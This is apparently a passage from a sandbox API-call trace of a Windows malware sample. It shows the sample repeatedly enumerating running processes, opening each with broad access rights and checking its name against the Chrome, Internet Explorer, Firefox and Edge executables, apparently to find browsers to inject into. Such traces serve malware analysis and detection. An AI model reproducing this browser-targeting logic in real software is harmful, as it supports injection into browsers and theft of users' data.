	[0220.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x4d7c
	[0220.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.315] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0220.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.316] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.316] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0220.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.316] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.317] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x4d80
	[0220.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.317] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.318] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.318] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.318] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.319] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.320] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.321] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x4d84
	[0220.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.321] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.321] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.321] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.322] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.322] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.322] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0220.323] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x468) returned 0x4d88
	[0220.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.323] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.323] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.323] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.323] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.324] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.324] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.324] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x4d8c
	[0220.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.325] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.325] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.325] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.326] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.326] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0220.327] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x4d90
	[0220.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.327] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0220.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.327] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.328] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0220.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.328] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.328] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0
	[0220.329] CloseHandle (hObject=0x188) returned 1
	[0220.329] Sleep (dwMilliseconds=0x64) 
	[0220.432] GetCurrentProcessId () returned 0x110
	[0220.432] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0220.437] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0220.438] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0220.439] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0220.441] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x4d94
	[0220.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.441] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.442] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.442] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.443] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.455] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x4d98
	[0220.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.455] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.455] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.455] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.455] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.456] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.456] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.456] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0220.456] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x4d9c
	[0220.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.457] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0220.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.457] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.457] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.457] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0220.458] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.458] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.458] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0220.459] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x4da0
	[0220.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.459] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0220.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.459] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.459] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.459] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0220.460] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.460] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.460] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0220.461] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x4da4
	[0220.461] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.461] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0220.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.462] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.462] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0220.462] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.462] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.463] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0220.463] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x4da8
	[0220.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.464] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0220.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.464] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.464] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.464] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0220.465] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.465] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.465] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0220.466] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x4dac
	[0220.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.466] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0220.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.466] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.466] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.466] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0220.467] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.467] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.467] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0220.467] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x4db0
	[0220.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.468] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0220.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.468] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.468] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0220.468] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.468] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.469] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.469] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x4db4
	[0220.469] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.469] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.470] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.470] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.470] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.470] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.471] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.471] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x4db8
	[0220.471] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.471] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.472] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.472] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.472] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.472] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.473] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x4dbc
	[0220.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.473] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.474] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.474] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.474] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.474] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x4dc0
	[0220.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.476] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.476] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.477] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.477] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.477] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.477] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x29, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.478] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x4dc4
	[0220.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.478] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.478] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.478] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.479] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.479] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.479] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.488] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x4dc8
	[0220.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.488] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.489] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.489] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.489] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.489] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x4dcc
	[0220.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.490] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.491] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.491] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.492] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.492] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0220.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4dd0
	[0220.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.493] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0220.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.493] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.493] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0220.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.494] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.494] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0220.495] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x4dd4
	[0220.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.495] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.495] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.496] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.496] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0220.496] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0220.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x4dd8
	[0220.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.497] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0220.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.497] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0220.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0220.498] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0220.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
